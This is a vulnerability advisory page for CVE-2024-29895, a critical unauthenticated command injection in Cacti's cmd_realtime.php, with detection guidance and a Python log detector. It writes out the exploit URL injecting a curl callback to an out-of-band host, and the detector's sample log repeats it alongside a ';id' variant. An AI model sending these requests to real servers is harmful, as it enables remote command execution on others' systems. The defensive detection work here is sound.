CVE-2024-29895
published 2024-05-14

CVE-2024-29895: Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated…

Priority: P1 (96), critical
CVSS 3.1: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Exploitation: exploited in the wild (ITW), public exploit available, listed in VulnCheck KEV; tactic: Initial access
EPSS: 94.38% (99.8th percentile)
Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary commands on the server when PHP's `register_argc_argv` option is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which, when `register_argc_argv` is `On`, PHP populates from the request's query string (split on `+`), so it is controlled by the URL. This option is `On` by default in many environments, including the official PHP Docker image. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.

Affected (2 ranges)

Vendor   Product   Version range   Fixed in
cacti    cacti
debian   cacti

Detection & IOCs (extracted from sources)

URL: /cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1
Path: /cacti/cmd_realtime.php
  • The vulnerability is exploitable via an unauthenticated GET request to /cacti/cmd_realtime.php: with `register_argc_argv` On, PHP splits the query string on `+` into `$_SERVER['argv']`, so a query such as `1+1&&<command>+1+1+1` places `1&&<command>` in the argument Cacti interpolates into its command line. Look for requests to cmd_realtime.php whose query string contains shell metacharacters such as `&&`, `|`, `;` or backticks, in raw or URL-encoded form.
  • Exploitation requires PHP's `register_argc_argv` to be `On` (the default in many environments, including the official PHP Docker image). Audit PHP configurations for this setting as a risk indicator: `php.ini-production` sets it `Off`, but the compiled-in default that applies when no php.ini is loaded is `On`.
  • The Nuclei PoC template matches on an HTTP 200 response together with an out-of-band HTTP callback whose request carries `User-Agent: curl`; monitor for unexpected outbound curl or other HTTP requests originating from the web server or PHP worker process that runs Cacti.
  • Cacti instances can be fingerprinted via favicon hash -1797138069 on Shodan/FOFA; use this to identify exposed attack surface.
  • The vulnerability exists only on the 1.3.x DEV branch of Cacti, not in stable releases.
  • The patch commit (53e8014d1f082034e0646edc6286cde3800c683d) was subsequently reverted (99633903cad0de5ace636249de16f77e57a3c8fc), so a build that picked up the patch may have been re-exposed by the revert. Verify the exact commit state of any deployed Cacti 1.3.x instance rather than relying on a version string.
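The following Python is an added example, not code from this page, the Nuclei template or the Cacti project. It models how PHP fills `$_SERVER['argv']` from the query string (the mechanism behind the description above), applies the cmd_realtime.php detection rule from the bullets to a few constructed access-log lines, and checks a php.ini fragment for `register_argc_argv`. The log lines, IP addresses, hostnames and function names are assumptions made for illustration.

```python
"""Added example (not code from the page, the Nuclei template or the Cacti project):
model PHP's $_SERVER['argv'] population from a query string and flag cmd_realtime.php
requests carrying shell metacharacters, over constructed access-log lines. Also checks
a php.ini fragment for register_argc_argv. IPs, hostnames and log lines are made up."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Shell metacharacters that never belong in cmd_realtime.php's positional arguments.
SHELL_META = re.compile(r"[;&|`$<>\n]")

# Match the script name under any install prefix (/cacti/ is only the common one).
TARGET = re.compile(r"/cmd_realtime\.php$")

# Minimal combined-log-format parser: only the fields the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def php_argv(query_string: str) -> list[str]:
    """Model of how PHP fills $_SERVER['argv'] under a web SAPI when
    register_argc_argv=On: the query string is split on '+'. This model applies no
    URL decoding, so '%20' stays as written. No query string means no entries."""
    if not query_string:
        return []
    return query_string.split("+")


def suspicious_args(query_string: str) -> list[str]:
    """Return argv entries containing shell metacharacters. Both the raw entry and its
    URL-decoded form are checked so that %3B (';') or %26%26 ('&&') are caught too."""
    return [
        arg
        for arg in php_argv(query_string)
        if SHELL_META.search(arg) or SHELL_META.search(unquote(arg))
    ]


def analyse_request(uri: str) -> dict | None:
    """Return a finding for a request URI that targets cmd_realtime.php with injected
    metacharacters, otherwise None. Splits on the first '?' by hand so a literal '#'
    in a hand-crafted request line is not mistaken for a fragment."""
    path, _, query = uri.partition("?")
    if not TARGET.search(path):
        return None
    hits = suspicious_args(query)
    if not hits:
        return None
    return {"path": path, "argv": php_argv(query), "injected": hits}


def scan_log(lines: list[str]) -> list[dict]:
    """Run analyse_request over access-log lines; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m["uri"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]))
            findings.append(finding)
    return findings


def argv_enabled(php_ini: str | None) -> bool:
    """True if register_argc_argv is effectively On. PHP's compiled-in default is On,
    so None (no php.ini loaded, as in the official Docker image unless one is copied
    in) means On; the last uncommented assignment wins, as in php.ini itself."""
    enabled = True
    if php_ini is None:
        return enabled
    for raw in php_ini.splitlines():
        line = raw.split(";", 1)[0].strip()
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "register_argc_argv":
            enabled = value.strip().strip('"').lower() in ("1", "on", "true", "yes")
    return enabled


# Constructed sample log: two benign lines, the PoC shape from the page, and a
# URL-encoded variant under a different install prefix.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/May/2024:09:58:10 +0000] "GET /cacti/cmd_realtime.php?1+123+5+1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/May/2024:10:02:31 +0000] "GET /cacti/cmd_realtime.php?1+1&&curl%20abc.oast.fun+1+1+1 HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '198.51.100.23 - - [14/May/2024:10:05:02 +0000] "GET /monitoring/cmd_realtime.php?1+1%3Bid+1+1+1 HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '10.0.0.5 - - [14/May/2024:09:59:00 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} injected={f['injected']} argv={f['argv']}")
    print("register_argc_argv with no php.ini:", argv_enabled(None))
    print("register_argc_argv with php.ini-production line:", argv_enabled("register_argc_argv = Off"))
```

The detector deliberately treats any metacharacter on this endpoint as an attempt, because cmd_realtime.php takes positional arguments rather than key=value pairs; on a live host the authoritative configuration check is `php -i | grep register_argc_argv` rather than parsing an ini file, and a hit in the web log should be correlated with the out-of-band indicator from the bullets (an unexpected outbound connection from the PHP worker process).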

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      10.0    CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
osv                       10.0    CRITICAL
vulncheck                 10.0    CRITICAL
vendor_debian             10.0    LOW